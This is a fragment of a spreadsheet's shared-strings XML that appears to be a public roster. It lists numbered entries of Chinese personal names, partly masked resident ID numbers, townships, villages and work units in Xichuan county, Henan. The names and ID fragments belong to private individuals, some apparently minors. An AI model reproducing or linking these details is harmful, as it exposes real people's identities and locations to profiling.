  </si>
  <si>
    <t>2323</t>
  </si>
  <si>
    <t>黄运甫</t>
  </si>
  <si>
    <t>412921********4039</t>
  </si>
  <si>
    <t>2324</t>
  </si>
  <si>
    <t>李贵荣</t>
  </si>
  <si>
    <t>412921********4026</t>
  </si>
  <si>
    <t>2325</t>
  </si>
  <si>
    <t>田子庆</t>
  </si>
  <si>
    <t>412921********4015</t>
  </si>
  <si>
    <t>2326</t>
  </si>
  <si>
    <t>翟文良</t>
  </si>
  <si>
    <t>412921********4012</t>
  </si>
  <si>
    <t>2327</t>
  </si>
  <si>
    <t>田华苗</t>
  </si>
  <si>
    <t>412921********4044</t>
  </si>
  <si>
    <t>2328</t>
  </si>
  <si>
    <t>翟建皓</t>
  </si>
  <si>
    <t>411321********4038</t>
  </si>
  <si>
    <t>2329</t>
  </si>
  <si>
    <t>田广瑞</t>
  </si>
  <si>
    <t>412921********4055</t>
  </si>
  <si>
    <t>2330</t>
  </si>
  <si>
    <t>2331</t>
  </si>
  <si>
    <t>李德群</t>
  </si>
  <si>
    <t>412921********4034</t>
  </si>
  <si>
    <t>2332</t>
  </si>
  <si>
    <t>陈贞莲</t>
  </si>
  <si>
    <t>412921********4020</t>
  </si>
  <si>
    <t>2333</t>
  </si>
  <si>
    <t>杨付全</t>
  </si>
  <si>
    <t>412921********4014</t>
  </si>
  <si>
    <t>2334</t>
  </si>
  <si>
    <t>翟成云</t>
  </si>
  <si>
    <t>412921********4089</t>
  </si>
  <si>
    <t>2335</t>
  </si>
  <si>
    <t>杨祥云</t>
  </si>
  <si>
    <t>411321********485X</t>
  </si>
  <si>
    <t>2336</t>
  </si>
  <si>
    <t>陈正霞</t>
  </si>
  <si>
    <t>412921********4021</t>
  </si>
  <si>
    <t>2337</t>
  </si>
  <si>
    <t>田子玲</t>
  </si>
  <si>
    <t>2338</t>
  </si>
  <si>
    <t>田子献</t>
  </si>
  <si>
    <t>412921********4096</t>
  </si>
  <si>
    <t>2339</t>
  </si>
  <si>
    <t>李廷芳</t>
  </si>
  <si>
    <t>2340</t>
  </si>
  <si>
    <t>李德朝</t>
  </si>
  <si>
    <t>412921********4010</t>
  </si>
  <si>
    <t>2341</t>
  </si>
  <si>
    <t>张庆玲</t>
  </si>
  <si>
    <t>411326********4065</t>
  </si>
  <si>
    <t>2342</t>
  </si>
  <si>
    <t>田广林</t>
  </si>
  <si>
    <t>412921********4013</t>
  </si>
  <si>
    <t>2343</t>
  </si>
  <si>
    <t>王清芳</t>
  </si>
  <si>
    <t>412921********4029</t>
  </si>
  <si>
    <t>2344</t>
  </si>
  <si>
    <t>田广新</t>
  </si>
  <si>
    <t>412921********4083</t>
  </si>
  <si>
    <t>2345</t>
  </si>
  <si>
    <t>黄振海</t>
  </si>
  <si>
    <t>2346</t>
  </si>
  <si>
    <t>张荣芳</t>
  </si>
  <si>
    <t>412921********4045</t>
  </si>
  <si>
    <t>2347</t>
  </si>
  <si>
    <t>王荣</t>
  </si>
  <si>
    <t>412921********4060</t>
  </si>
  <si>
    <t>4113211124</t>
  </si>
  <si>
    <t>2348</t>
  </si>
  <si>
    <t>杨付有</t>
  </si>
  <si>
    <t>412921********4058</t>
  </si>
  <si>
    <t>2349</t>
  </si>
  <si>
    <t>席天玉</t>
  </si>
  <si>
    <t>2350</t>
  </si>
  <si>
    <t>黄秀梅</t>
  </si>
  <si>
    <t>412921********4067</t>
  </si>
  <si>
    <t>2351</t>
  </si>
  <si>
    <t>崔长梅</t>
  </si>
  <si>
    <t>2352</t>
  </si>
  <si>
    <t>李瑞娟</t>
  </si>
  <si>
    <t>412921********0623</t>
  </si>
  <si>
    <t>2353</t>
  </si>
  <si>
    <t>张建鹏</t>
  </si>
  <si>
    <t>2354</t>
  </si>
  <si>
    <t>杨贵兰</t>
  </si>
  <si>
    <t>412921********4022</t>
  </si>
  <si>
    <t>2355</t>
  </si>
  <si>
    <t>黄天春</t>
  </si>
  <si>
    <t>2356</t>
  </si>
  <si>
    <t>杨寿华</t>
  </si>
  <si>
    <t>412921********4063</t>
  </si>
  <si>
    <t>2357</t>
  </si>
  <si>
    <t>412921********402X</t>
  </si>
  <si>
    <t>2358</t>
  </si>
  <si>
    <t xml:space="preserve">田舒飒 </t>
  </si>
  <si>
    <t>411326********4029</t>
  </si>
  <si>
    <t>2359</t>
  </si>
  <si>
    <t>高书梅</t>
  </si>
  <si>
    <t>412921********4107</t>
  </si>
  <si>
    <t>2360</t>
  </si>
  <si>
    <t>薛传勤</t>
  </si>
  <si>
    <t>412921********4127</t>
  </si>
  <si>
    <t>2361</t>
  </si>
  <si>
    <t>田广政</t>
  </si>
  <si>
    <t>2362</t>
  </si>
  <si>
    <t>张兆生</t>
  </si>
  <si>
    <t>2363</t>
  </si>
  <si>
    <t>田广霞</t>
  </si>
  <si>
    <t>2364</t>
  </si>
  <si>
    <t>李荣义</t>
  </si>
  <si>
    <t>412921********4037</t>
  </si>
  <si>
    <t>2365</t>
  </si>
  <si>
    <t>张建娥</t>
  </si>
  <si>
    <t>412921********4066</t>
  </si>
  <si>
    <t>2366</t>
  </si>
  <si>
    <t>张新林</t>
  </si>
  <si>
    <t>412921********4019</t>
  </si>
  <si>
    <t>2367</t>
  </si>
  <si>
    <t>朱晓灵</t>
  </si>
  <si>
    <t>2368</t>
  </si>
  <si>
    <t>田广杰</t>
  </si>
  <si>
    <t>2369</t>
  </si>
  <si>
    <t>渠营</t>
  </si>
  <si>
    <t>412901********0503</t>
  </si>
  <si>
    <t>4113211105</t>
  </si>
  <si>
    <t>2370</t>
  </si>
  <si>
    <t>翟文玲</t>
  </si>
  <si>
    <t>2371</t>
  </si>
  <si>
    <t>杨勇</t>
  </si>
  <si>
    <t>2372</t>
  </si>
  <si>
    <t>廖敬雷</t>
  </si>
  <si>
    <t>411326********4039</t>
  </si>
  <si>
    <t>2373</t>
  </si>
  <si>
    <t>王霞</t>
  </si>
  <si>
    <t>2374</t>
  </si>
  <si>
    <t>孙运明</t>
  </si>
  <si>
    <t>412921********401X</t>
  </si>
  <si>
    <t>2375</t>
  </si>
  <si>
    <t>杨新转</t>
  </si>
  <si>
    <t>2376</t>
  </si>
  <si>
    <t>张庆昌</t>
  </si>
  <si>
    <t>412921********3635</t>
  </si>
  <si>
    <t>2377</t>
  </si>
  <si>
    <t>黄鑫雨</t>
  </si>
  <si>
    <t>411326********4036</t>
  </si>
  <si>
    <t>2378</t>
  </si>
  <si>
    <t>赵怀广</t>
  </si>
  <si>
    <t>412921********4077</t>
  </si>
  <si>
    <t>2379</t>
  </si>
  <si>
    <t>席天玲</t>
  </si>
  <si>
    <t>412921********4125</t>
  </si>
  <si>
    <t>2380</t>
  </si>
  <si>
    <t>齐森</t>
  </si>
  <si>
    <t>411326********4017</t>
  </si>
  <si>
    <t>2381</t>
  </si>
  <si>
    <t>赵国基</t>
  </si>
  <si>
    <t>2382</t>
  </si>
  <si>
    <t>赵烜</t>
  </si>
  <si>
    <t>411321********4014</t>
  </si>
  <si>
    <t>2383</t>
  </si>
  <si>
    <t>2384</t>
  </si>
  <si>
    <t>瓦渣岭</t>
  </si>
  <si>
    <t>叶光</t>
  </si>
  <si>
    <t>4113211120</t>
  </si>
  <si>
    <t>2385</t>
  </si>
  <si>
    <t>疙瘩坡村</t>
  </si>
  <si>
    <t>张雅迪</t>
  </si>
  <si>
    <t>411321********0328</t>
  </si>
  <si>
    <t>4113211119</t>
  </si>
  <si>
    <t>2386</t>
  </si>
  <si>
    <t>翟传飞</t>
  </si>
  <si>
    <t>412921********4018</t>
  </si>
  <si>
    <t>2387</t>
  </si>
  <si>
    <t>外贸局</t>
  </si>
  <si>
    <t>2388</t>
  </si>
  <si>
    <t>南河店镇</t>
  </si>
  <si>
    <t>王满瑞</t>
  </si>
  <si>
    <t>412921********3666</t>
  </si>
  <si>
    <t>4113211003</t>
  </si>
  <si>
    <t>2389</t>
  </si>
  <si>
    <t>赵霞</t>
  </si>
  <si>
    <t>412921********3649</t>
  </si>
  <si>
    <t>4113211004</t>
  </si>
  <si>
    <t>2390</t>
  </si>
  <si>
    <t>韩付芝</t>
  </si>
  <si>
    <t>2391</t>
  </si>
  <si>
    <t>孙运果</t>
  </si>
  <si>
    <t>412921********3615</t>
  </si>
  <si>
    <t>2392</t>
  </si>
  <si>
    <t>孙建勋</t>
  </si>
  <si>
    <t>411321********3614</t>
  </si>
  <si>
    <t>2393</t>
  </si>
  <si>
    <t>王景珩</t>
  </si>
  <si>
    <t>411322********0159</t>
  </si>
  <si>
    <t>2394</t>
  </si>
  <si>
    <t>毛金生</t>
  </si>
  <si>
    <t>4113211014</t>
  </si>
  <si>
    <t>2395</t>
  </si>
  <si>
    <t>李敬霞</t>
  </si>
  <si>
    <t>412921********3621</t>
  </si>
  <si>
    <t>2396</t>
  </si>
  <si>
    <t>李红依</t>
  </si>
  <si>
    <t>411321********3648</t>
  </si>
  <si>
    <t>2397</t>
  </si>
  <si>
    <t>杨书荣</t>
  </si>
  <si>
    <t>412921********3643</t>
  </si>
  <si>
    <t>2398</t>
  </si>
  <si>
    <t>蚕厂家属院</t>
  </si>
  <si>
    <t>翟世丽</t>
  </si>
  <si>
    <t>412921********0465</t>
  </si>
  <si>
    <t>4113211009</t>
  </si>
  <si>
    <t>2399</t>
  </si>
  <si>
    <t>焦治原</t>
  </si>
  <si>
    <t>411326********3615</t>
  </si>
  <si>
    <t>2400</t>
  </si>
  <si>
    <t>张庆恒</t>
  </si>
  <si>
    <t>412921********3652</t>
  </si>
  <si>
    <t>2401</t>
  </si>
  <si>
    <t>李琛</t>
  </si>
  <si>
    <t>412921********3613</t>
  </si>
  <si>
    <t>4113211007</t>
  </si>
  <si>
    <t>2402</t>
  </si>
  <si>
    <t>李月</t>
  </si>
  <si>
    <t>2403</t>
  </si>
  <si>
    <t>李建</t>
  </si>
  <si>
    <t>412921********3630</t>
  </si>
  <si>
    <t>2404</t>
  </si>
  <si>
    <t>李长健</t>
  </si>
  <si>
    <t>2405</t>
  </si>
  <si>
    <t>杨德荣</t>
  </si>
  <si>
    <t>412921********362X</t>
  </si>
  <si>
    <t>2406</t>
  </si>
  <si>
    <t>孙运超</t>
  </si>
  <si>
    <t>412921********0232</t>
  </si>
  <si>
    <t>2407</t>
  </si>
  <si>
    <t>张广东</t>
  </si>
  <si>
    <t>412921********3612</t>
  </si>
  <si>
    <t>2408</t>
  </si>
  <si>
    <t>张世豪</t>
  </si>
  <si>
    <t>2409</t>
  </si>
  <si>
    <t>刘长贵</t>
  </si>
  <si>
    <t>2410</t>
  </si>
  <si>
    <t>蚕业局</t>
  </si>
  <si>
    <t>马旭</t>
  </si>
  <si>
    <t>2411</t>
  </si>
  <si>
    <t>姬雅卓</t>
  </si>
  <si>
    <t>411326********0046</t>
  </si>
  <si>
    <t>2412</t>
  </si>
  <si>
    <t>马荣品</t>
  </si>
  <si>
    <t>412921********3669</t>
  </si>
  <si>
    <t>2413</t>
  </si>
  <si>
    <t>杨冰</t>
  </si>
  <si>
    <t>2414</t>
  </si>
  <si>
    <t>杨晓宇</t>
  </si>
  <si>
    <t>411321********362X</t>
  </si>
  <si>
    <t>2415</t>
  </si>
  <si>
    <t>工信局</t>
  </si>
  <si>
    <t>胡进明</t>
  </si>
  <si>
    <t>412921********361X</t>
  </si>
  <si>
    <t>2416</t>
  </si>
  <si>
    <t>朱保彦</t>
  </si>
  <si>
    <t>2417</t>
  </si>
  <si>
    <t>李泉</t>
  </si>
  <si>
    <t>412921********3632</t>
  </si>
  <si>
    <t>2418</t>
  </si>
  <si>
    <t>邢远朝</t>
  </si>
  <si>
    <t>2419</t>
  </si>
  <si>
    <t>赵天超</t>
  </si>
  <si>
    <t>4113211001</t>
  </si>
  <si>
    <t>2420</t>
  </si>
  <si>
    <t>宰来均</t>
  </si>
  <si>
    <t>412921********3617</t>
  </si>
  <si>
    <t>2421</t>
  </si>
  <si>
    <t>武建</t>
  </si>
  <si>
    <t>412921********4813</t>
  </si>
  <si>
    <t>4113211020</t>
  </si>
  <si>
    <t>2422</t>
  </si>
  <si>
    <t>王立</t>
  </si>
  <si>
    <t>412921********3654</t>
  </si>
  <si>
    <t>2423</t>
  </si>
  <si>
    <t>苗莺兰</t>
  </si>
  <si>
    <t>412921********3624</t>
  </si>
  <si>
    <t>2424</t>
  </si>
  <si>
    <t>412921********3633</t>
  </si>
  <si>
    <t>2425</t>
  </si>
  <si>
    <t>马哲欣</t>
  </si>
  <si>
    <t>2426</t>
  </si>
  <si>
    <t>王新华</t>
  </si>
  <si>
    <t>2427</t>
  </si>
  <si>
    <t>马春雨</t>
  </si>
  <si>
    <t>411326********0105</t>
  </si>
  <si>
    <t>2428</t>
  </si>
  <si>
    <t>贺振邦</t>
  </si>
  <si>
    <t>412921********4410</t>
  </si>
  <si>
    <t>2429</t>
  </si>
  <si>
    <t>李永法</t>
  </si>
  <si>
    <t>412921********3678</t>
  </si>
  <si>
    <t>2430</t>
  </si>
  <si>
    <t>曾祥付</t>
  </si>
  <si>
    <t>411326********375X</t>
  </si>
  <si>
    <t>2431</t>
  </si>
  <si>
    <t>高杨</t>
  </si>
  <si>
    <t>2432</t>
  </si>
  <si>
    <t>祖克锗</t>
  </si>
  <si>
    <t>411324********001X</t>
  </si>
  <si>
    <t>2433</t>
  </si>
  <si>
    <t>李勇</t>
  </si>
  <si>
    <t>412921********3636</t>
  </si>
  <si>
    <t>2434</t>
  </si>
  <si>
    <t>李兵</t>
  </si>
  <si>
    <t>412921********3658</t>
  </si>
  <si>
    <t>2435</t>
  </si>
  <si>
    <t>赵国</t>
  </si>
  <si>
    <t>2436</t>
  </si>
  <si>
    <t>赵峻皓</t>
  </si>
  <si>
    <t>411321********365X</t>
  </si>
  <si>
    <t>2437</t>
  </si>
  <si>
    <t>牛付春</t>
  </si>
  <si>
    <t>412921********4439</t>
  </si>
  <si>
    <t>4113211005</t>
  </si>
  <si>
    <t>2438</t>
  </si>
  <si>
    <t>马良伟</t>
  </si>
  <si>
    <t>412921********4457</t>
  </si>
  <si>
    <t>2439</t>
  </si>
  <si>
    <t>姬明粮</t>
  </si>
  <si>
    <t>2440</t>
  </si>
  <si>
    <t>物资局</t>
  </si>
  <si>
    <t>尚德京</t>
  </si>
  <si>
    <t>4113211018</t>
  </si>
  <si>
    <t>2441</t>
  </si>
  <si>
    <t>甘广东</t>
  </si>
  <si>
    <t>2023年10月</t>
  </si>
  <si>
    <t>2442</t>
  </si>
  <si>
    <t>张林林</t>
  </si>
  <si>
    <t>2443</t>
  </si>
  <si>
    <t>张栋威</t>
  </si>
  <si>
    <t>411321********3637</t>
  </si>
  <si>
    <t>2444</t>
  </si>
  <si>
    <t>张紫雯</t>
  </si>
  <si>
    <t>411321********3629</t>
  </si>
  <si>
    <t>2445</t>
  </si>
  <si>
    <t>钾长石矿</t>
  </si>
  <si>
    <t>曾凡群</t>
  </si>
  <si>
    <t>2446</t>
  </si>
  <si>
    <t>侯明森</t>
  </si>
  <si>
    <t>2447</t>
  </si>
  <si>
    <t>医药部</t>
  </si>
  <si>
    <t>王净远</t>
  </si>
  <si>
    <t>2448</t>
  </si>
  <si>
    <t>赵丽</t>
  </si>
  <si>
    <t>411326********4024</t>
  </si>
  <si>
    <t>2449</t>
  </si>
  <si>
    <t>南河店镇范庄村</t>
  </si>
  <si>
    <t>边峰</t>
  </si>
  <si>
    <t>411321********3655</t>
  </si>
  <si>
    <t>2450</t>
  </si>
  <si>
    <t>边俊博</t>
  </si>
  <si>
    <t>411321********3657</t>
  </si>
  <si>
    <t>2451</t>
  </si>
  <si>
    <t>农机配件厂</t>
  </si>
  <si>
    <t>邢远贞</t>
  </si>
  <si>
    <t>412921********445X</t>
  </si>
  <si>
    <t>2452</t>
  </si>
  <si>
    <t>贺华</t>
  </si>
  <si>
    <t>412921********3705</t>
  </si>
  <si>
    <t>2453</t>
  </si>
  <si>
    <t>全小强</t>
  </si>
  <si>
    <t>2454</t>
  </si>
  <si>
    <t>白土岗镇</t>
  </si>
  <si>
    <t>马玉祥</t>
  </si>
  <si>
    <t>411321********441X</t>
  </si>
  <si>
    <t>411321122001</t>
  </si>
  <si>
    <t>2455</t>
  </si>
  <si>
    <t>李丰昌</t>
  </si>
  <si>
    <t>412921********4453</t>
  </si>
  <si>
    <t>2456</t>
  </si>
  <si>
    <t>张居军</t>
  </si>
  <si>
    <t>412921********4417</t>
  </si>
  <si>
    <t>2457</t>
  </si>
  <si>
    <t>吴太平</t>
  </si>
  <si>
    <t>412921********4445</t>
  </si>
  <si>
    <t>2458</t>
  </si>
  <si>
    <t>董悦</t>
  </si>
  <si>
    <t>412921********4431</t>
  </si>
  <si>
    <t>2459</t>
  </si>
  <si>
    <t>马明英</t>
  </si>
  <si>
    <t>2460</t>
  </si>
  <si>
    <t>邢明现</t>
  </si>
  <si>
    <t>412901********503X</t>
  </si>
  <si>
    <t>2461</t>
  </si>
  <si>
    <t>刘三贵</t>
  </si>
  <si>
    <t>412921********4437</t>
  </si>
  <si>
    <t>2462</t>
  </si>
  <si>
    <t>刘宗霖</t>
  </si>
  <si>
    <t>411321********0139</t>
  </si>
  <si>
    <t>2025年9月</t>
  </si>
  <si>
    <t>2463</t>
  </si>
  <si>
    <t>候太顺</t>
  </si>
  <si>
    <t>412921********443X</t>
  </si>
  <si>
    <t>2464</t>
  </si>
  <si>
    <t>候璎育</t>
  </si>
  <si>
    <t>411321********5207</t>
  </si>
  <si>
    <t>2465</t>
  </si>
  <si>
    <t>王壮</t>
  </si>
  <si>
    <t>411326********4451</t>
  </si>
  <si>
    <t>2466</t>
  </si>
  <si>
    <t>刘玉</t>
  </si>
  <si>
    <t>412921********4425</t>
  </si>
  <si>
    <t>2467</t>
  </si>
  <si>
    <t>孟遥</t>
  </si>
  <si>
    <t>2468</t>
  </si>
  <si>
    <t>2469</t>
  </si>
  <si>
    <t>谢俊</t>
  </si>
  <si>
    <t>2470</t>
  </si>
  <si>
    <t>张天云</t>
  </si>
  <si>
    <t>412921********4485</t>
  </si>
  <si>
    <t>2471</t>
  </si>
  <si>
    <t>张新武</t>
  </si>
  <si>
    <t>412921********4415</t>
  </si>
  <si>
    <t>2472</t>
  </si>
  <si>
    <t>谢银平</t>
  </si>
  <si>
    <t>2473</t>
  </si>
  <si>
    <t>张新江</t>
  </si>
  <si>
    <t>412921********4515</t>
  </si>
  <si>
    <t>2474</t>
  </si>
  <si>
    <t>张天星</t>
  </si>
  <si>
    <t>411326********4439</t>
  </si>
  <si>
    <t>2475</t>
  </si>
  <si>
    <t>尹延峰</t>
  </si>
  <si>
    <t>411326********4411</t>
  </si>
  <si>
    <t>2476</t>
  </si>
  <si>
    <t>白土岗镇校委会</t>
  </si>
  <si>
    <t>李广朝</t>
  </si>
  <si>
    <t>412901********1513</t>
  </si>
  <si>
    <t>2477</t>
  </si>
  <si>
    <t>白土岗镇供销社</t>
  </si>
  <si>
    <t>曾祥晓</t>
  </si>
  <si>
    <t>412921********4475</t>
  </si>
  <si>
    <t>2478</t>
  </si>
  <si>
    <t>张学顺</t>
  </si>
  <si>
    <t>2024年3月</t>
  </si>
  <si>
    <t>2479</t>
  </si>
  <si>
    <t>张召普</t>
  </si>
  <si>
    <t>2480</t>
  </si>
  <si>
    <t>刘振克</t>
  </si>
  <si>
    <t>2481</t>
  </si>
  <si>
    <t>板山坪镇</t>
  </si>
  <si>
    <t>赵长玉</t>
  </si>
  <si>
    <t>412921********4912</t>
  </si>
  <si>
    <t>411321130801</t>
  </si>
  <si>
    <t>2482</t>
  </si>
  <si>
    <t>王守成</t>
  </si>
  <si>
    <t>411326********4812</t>
  </si>
  <si>
    <t>2483</t>
  </si>
  <si>
    <t>郑喜成</t>
  </si>
  <si>
    <t>2484</t>
  </si>
  <si>
    <t>板山坪村</t>
  </si>
  <si>
    <t>王娟</t>
  </si>
  <si>
    <t>411326********4842</t>
  </si>
  <si>
    <t>2485</t>
  </si>
  <si>
    <t>高良溥</t>
  </si>
  <si>
    <t>411326********4816</t>
  </si>
  <si>
    <t>2486</t>
  </si>
  <si>
    <t>乔端镇</t>
  </si>
  <si>
    <t>张小敏</t>
  </si>
  <si>
    <t>4113211407</t>
  </si>
  <si>
    <t>2487</t>
  </si>
  <si>
    <t>张景玲</t>
  </si>
  <si>
    <t>412921********586X</t>
  </si>
  <si>
    <t>2488</t>
  </si>
  <si>
    <t>彭得立</t>
  </si>
  <si>
    <t>412921********5853</t>
  </si>
  <si>
    <t>2489</t>
  </si>
  <si>
    <t>孙文伟</t>
  </si>
  <si>
    <t>412921********5819</t>
  </si>
  <si>
    <t>2490</t>
  </si>
  <si>
    <t>赵国娥</t>
  </si>
  <si>
    <t>412921********582X</t>
  </si>
  <si>
    <t>2491</t>
  </si>
  <si>
    <t>王新荣</t>
  </si>
  <si>
    <t>412921********5822</t>
  </si>
  <si>
    <t>2492</t>
  </si>
  <si>
    <t>卫生局</t>
  </si>
  <si>
    <t>张豪</t>
  </si>
  <si>
    <t>411326********5816</t>
  </si>
  <si>
    <t>2493</t>
  </si>
  <si>
    <t>裴来明</t>
  </si>
  <si>
    <t>412921********5837</t>
  </si>
  <si>
    <t>2494</t>
  </si>
  <si>
    <t>杨翠平</t>
  </si>
  <si>
    <t>411321********5824</t>
  </si>
  <si>
    <t>411321140101</t>
  </si>
  <si>
    <t>2495</t>
  </si>
  <si>
    <t>李秀军</t>
  </si>
  <si>
    <t>412921********5812</t>
  </si>
  <si>
    <t>2496</t>
  </si>
  <si>
    <t>苗学广</t>
  </si>
  <si>
    <t>412921********581X</t>
  </si>
  <si>
    <t>2497</t>
  </si>
  <si>
    <t>王小双</t>
  </si>
  <si>
    <t>2498</t>
  </si>
  <si>
    <t>马市坪乡</t>
  </si>
  <si>
    <t>徐国强</t>
  </si>
  <si>
    <t>412921********5513</t>
  </si>
  <si>
    <t>2499</t>
  </si>
  <si>
    <t>王支丽</t>
  </si>
  <si>
    <t>2500</t>
  </si>
  <si>
    <t>孙中玲</t>
  </si>
  <si>
    <t>412921********5543</t>
  </si>
  <si>
    <t>2501</t>
  </si>
  <si>
    <t>邵青运</t>
  </si>
  <si>
    <t>412921********5510</t>
  </si>
  <si>
    <t>2502</t>
  </si>
  <si>
    <t>尚红燕</t>
  </si>
  <si>
    <t>652901********4029</t>
  </si>
  <si>
    <t>2503</t>
  </si>
  <si>
    <t>刘长青</t>
  </si>
  <si>
    <t>412921********5561</t>
  </si>
  <si>
    <t>2504</t>
  </si>
  <si>
    <t>吕炎</t>
  </si>
  <si>
    <t>411326********5515</t>
  </si>
  <si>
    <t>2505</t>
  </si>
  <si>
    <t>何庆超</t>
  </si>
  <si>
    <t>412921********5518</t>
  </si>
  <si>
    <t>2506</t>
  </si>
  <si>
    <t>刘金堂</t>
  </si>
  <si>
    <t>412921********5557</t>
  </si>
  <si>
    <t>2507</t>
  </si>
  <si>
    <t>综合厂</t>
  </si>
  <si>
    <t>王长宽</t>
  </si>
  <si>
    <t>412921********551X</t>
  </si>
  <si>
    <t>2508</t>
  </si>
  <si>
    <t>郑九兰</t>
  </si>
  <si>
    <t>412921********5525</t>
  </si>
  <si>
    <t>2509</t>
  </si>
  <si>
    <t>靳涛</t>
  </si>
  <si>
    <t>412921********5512</t>
  </si>
  <si>
    <t>2510</t>
  </si>
  <si>
    <t>崔庄乡</t>
  </si>
  <si>
    <t>李延瑞</t>
  </si>
  <si>
    <t>4113211615</t>
  </si>
  <si>
    <t>2511</t>
  </si>
  <si>
    <t>沈朝永</t>
  </si>
  <si>
    <t>412921********5194</t>
  </si>
  <si>
    <t>4113211699</t>
  </si>
  <si>
    <t>2512</t>
  </si>
  <si>
    <t>黄志现</t>
  </si>
  <si>
    <t>412921********5137</t>
  </si>
  <si>
    <t>4113211605</t>
  </si>
  <si>
    <t>2513</t>
  </si>
  <si>
    <t>梁付强</t>
  </si>
  <si>
    <t>412921********5158</t>
  </si>
  <si>
    <t>2514</t>
  </si>
  <si>
    <t>赵国静</t>
  </si>
  <si>
    <t>411303********1543</t>
  </si>
  <si>
    <t>4113211616</t>
  </si>
  <si>
    <t>2515</t>
  </si>
  <si>
    <t>张紫芃</t>
  </si>
  <si>
    <t>411326********2450</t>
  </si>
  <si>
    <t>2516</t>
  </si>
  <si>
    <t>张建坤</t>
  </si>
  <si>
    <t>411326********5110</t>
  </si>
  <si>
    <t>2517</t>
  </si>
  <si>
    <t>崔庄乡政府</t>
  </si>
  <si>
    <t>杨海坡</t>
  </si>
  <si>
    <t>411002********1032</t>
  </si>
  <si>
    <t>4113211607</t>
  </si>
  <si>
    <t>2023年8月</t>
  </si>
  <si>
    <t>2518</t>
  </si>
  <si>
    <t>崔庄供销社</t>
  </si>
  <si>
    <t>贺保玉</t>
  </si>
  <si>
    <t>412921********5139</t>
  </si>
  <si>
    <t>4113211610</t>
  </si>
  <si>
    <t>2023年12月</t>
  </si>
  <si>
    <t>2519</t>
  </si>
  <si>
    <t>水文站</t>
  </si>
  <si>
    <t>王启帆</t>
  </si>
  <si>
    <t>411321********0196</t>
  </si>
  <si>
    <t>4113211611</t>
  </si>
  <si>
    <t>2520</t>
  </si>
  <si>
    <t>魏宰</t>
  </si>
  <si>
    <t>411326********5132</t>
  </si>
  <si>
    <t>2521</t>
  </si>
  <si>
    <t>李平</t>
  </si>
  <si>
    <t>412921********5134</t>
  </si>
  <si>
    <t>2522</t>
  </si>
  <si>
    <t>乡政府家属院</t>
  </si>
  <si>
    <t>朱延华</t>
  </si>
  <si>
    <t>2523</t>
  </si>
  <si>
    <t>闫建华</t>
  </si>
  <si>
    <t>2524</t>
  </si>
  <si>
    <t>军工办</t>
  </si>
  <si>
    <t>红阳厂社区</t>
  </si>
  <si>
    <t>王淑琴</t>
  </si>
  <si>
    <t>2525</t>
  </si>
  <si>
    <t>苏媛媛</t>
  </si>
  <si>
    <t>411326********2028</t>
  </si>
  <si>
    <t>2526</t>
  </si>
  <si>
    <t>闫星阁</t>
  </si>
  <si>
    <t>2527</t>
  </si>
  <si>
    <t>王化太</t>
  </si>
  <si>
    <t>412921********2857</t>
  </si>
  <si>
    <t>2528</t>
  </si>
  <si>
    <t>王建国</t>
  </si>
  <si>
    <t>2529</t>
  </si>
  <si>
    <t>张蔚明</t>
  </si>
  <si>
    <t>2530</t>
  </si>
  <si>
    <t>别桂林</t>
  </si>
  <si>
    <t>2531</t>
  </si>
  <si>
    <t>朱清华</t>
  </si>
  <si>
    <t>2532</t>
  </si>
  <si>
    <t>赵彬</t>
  </si>
  <si>
    <t>411326********201X</t>
  </si>
  <si>
    <t>2533</t>
  </si>
  <si>
    <t>杨枝山</t>
  </si>
  <si>
    <t>411326********203X</t>
  </si>
  <si>
    <t>2534</t>
  </si>
  <si>
    <t>周金苹</t>
  </si>
  <si>
    <t>2535</t>
  </si>
  <si>
    <t>王建勤</t>
  </si>
  <si>
    <t>2536</t>
  </si>
  <si>
    <t>朱广秀</t>
  </si>
  <si>
    <t>411326********2021</t>
  </si>
  <si>
    <t>2537</t>
  </si>
  <si>
    <t>丁素雪</t>
  </si>
  <si>
    <t>2538</t>
  </si>
  <si>
    <t>倪浩源</t>
  </si>
  <si>
    <t>411321********0230</t>
  </si>
  <si>
    <t>2539</t>
  </si>
  <si>
    <t>倪珑芮</t>
  </si>
  <si>
    <t>2540</t>
  </si>
  <si>
    <t>纪宁</t>
  </si>
  <si>
    <t>411326********202X</t>
  </si>
  <si>
    <t>2541</t>
  </si>
  <si>
    <t>张华林</t>
  </si>
  <si>
    <t>2542</t>
  </si>
  <si>
    <t>郝子菡</t>
  </si>
  <si>
    <t>411321********2021</t>
  </si>
  <si>
    <t>2543</t>
  </si>
  <si>
    <t>郝子轩</t>
  </si>
  <si>
    <t>411321********0197</t>
  </si>
  <si>
    <t>2544</t>
  </si>
  <si>
    <t>王博惠</t>
  </si>
  <si>
    <t>411321********4634</t>
  </si>
  <si>
    <t>2545</t>
  </si>
  <si>
    <t>王浩惠</t>
  </si>
  <si>
    <t>411321********0379</t>
  </si>
  <si>
    <t>2546</t>
  </si>
  <si>
    <t>向东厂</t>
  </si>
  <si>
    <t>张淑良</t>
  </si>
  <si>
    <t>2547</t>
  </si>
  <si>
    <t>张莲莲</t>
  </si>
  <si>
    <t>412921********1646</t>
  </si>
  <si>
    <t>2548</t>
  </si>
  <si>
    <t>吴建民</t>
  </si>
  <si>
    <t>2549</t>
  </si>
  <si>
    <t>王其西</t>
  </si>
  <si>
    <t>2550</t>
  </si>
  <si>
    <t>魏小建</t>
  </si>
  <si>
    <t>412921********1534</t>
  </si>
  <si>
    <t>2551</t>
  </si>
  <si>
    <t>张尚贵</t>
  </si>
  <si>
    <t>412921********1125</t>
  </si>
  <si>
    <t>2552</t>
  </si>
  <si>
    <t>李洪秀</t>
  </si>
  <si>
    <t>2553</t>
  </si>
  <si>
    <t>2554</t>
  </si>
  <si>
    <t>师小丽</t>
  </si>
  <si>
    <t>2555</t>
  </si>
  <si>
    <t>赵洋</t>
  </si>
  <si>
    <t>2556</t>
  </si>
  <si>
    <t>马爱则</t>
  </si>
  <si>
    <t>2557</t>
  </si>
  <si>
    <t>红宇社区</t>
  </si>
  <si>
    <t>张青芳</t>
  </si>
  <si>
    <t>412921********0802</t>
  </si>
  <si>
    <t>2558</t>
  </si>
  <si>
    <t>红宇厂</t>
  </si>
  <si>
    <t>王清荣</t>
  </si>
  <si>
    <t>2559</t>
  </si>
  <si>
    <t>李超</t>
  </si>
  <si>
    <t>411326********0759</t>
  </si>
  <si>
    <t>2560</t>
  </si>
  <si>
    <t>孟凡霞</t>
  </si>
  <si>
    <t>2561</t>
  </si>
  <si>
    <t>刘家伊</t>
  </si>
  <si>
    <t>2562</t>
  </si>
  <si>
    <t>王玉红</t>
  </si>
